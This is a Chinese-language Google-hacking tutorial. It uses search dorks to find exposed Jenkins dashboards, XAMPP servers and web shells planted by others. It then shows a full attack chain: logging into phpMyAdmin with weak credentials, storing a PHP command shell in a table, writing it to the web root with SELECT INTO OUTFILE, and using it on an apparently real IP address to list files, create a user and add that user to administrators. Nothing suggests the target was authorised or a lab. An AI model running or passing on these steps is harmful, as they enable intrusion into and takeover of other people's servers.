1.寻找持续构建工具Jenkins的管理面板
为什么要去寻找,因为有我们有可能从中获取某些项目的源代码或者敏感信息
1.谷歌hack的查询语法请参考文章
https://blog.csdn.net/weixin_43198291/article/details/112161738
2.寻找持续构建工具Jenkins的管理面板
例子
inurl:8080 intitle:"Dashboard[Jenkins]"
URL中存在关键字的网页(inurl)网页标题中的关键字(intitle)
我们随便找一个进去看看
接着我们点击一个用户提交的项目,可以看到有一个GitHub图标,进入之后就可以看它的源代码了。
2.综合利用各种信息搞定xampp
XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用。
寻找安装了xampp的主机:
:inurl:"xampp/index" intext:"XAMPP for Windows"
寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入一句话木马提权,获取服务器管理权限。
我们可以从当这个能看到一些版本信息,建议大家去找1.7.3版本以下的,因为版本越低,安全越低
我们找一个点进去
在这个页面中,可以看到两个非常有用的信息,phpinfo(),phpMyAdmin的管理入口
我们点击phpMyAdmin,返回了错误信息,原因是mysql数据库未开启
有时候运气好的话会直接进入
加下来我们利用phpmyadmain添加一个用户
我们之前已经创建了一个用户root1 ,密码root1
创建一个表
向表里插入一条数据,写一个php,意思是调用cmd程序给系统执行
我们查一下发现已经在里面了
下一步,我们将这句话移动到磁盘里,这就形成了一个后门
select * into outfile '路径/file' from aa
这里重点是将这段php程序移动到网站目录下执行,我们怎么找呢,这个时候就是使用刚才phpinfo信息的时候了。
这个标题有php的一些主要信息
我们认为当前网站页面在C:/xampp/htdocs/xampp这个目录下,我们可以写到这个下面
select * into outfile 'C:/xampp/htdocs/xampp/aa.php' from aa
现在我们去浏览器上访问aa.php文件,右键查看源代码,可以看到,说明成功了
我们现在给对方服务器传一个参数,浏览器就会返回很多目录给我们
http://112.137.163.87/xampp/aa.php?cmd=dir
我们现在在对方服务器创建一个用户
http://112.137.163.87/xampp/aa.php?cmd=net user xxx 123456 /add
然后将普通用户添加到管理用户组里面
http://112.137.163.87/xampp/aa.php?cmd=net localgroup administrators xxx /add
这个时候就可以远程连接了。
3.后门查找
- Google搜索目标:intitle:"=[ 1n73ct10n privat shell ]="
- intitle:"WSO 2.4" [Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]
我们随便谷歌一个进入可以看到类似这种
4.关于google hack database
- https://www.exploit-db.com/
- 需要自己灵活的扩展,以适应中文站点的查询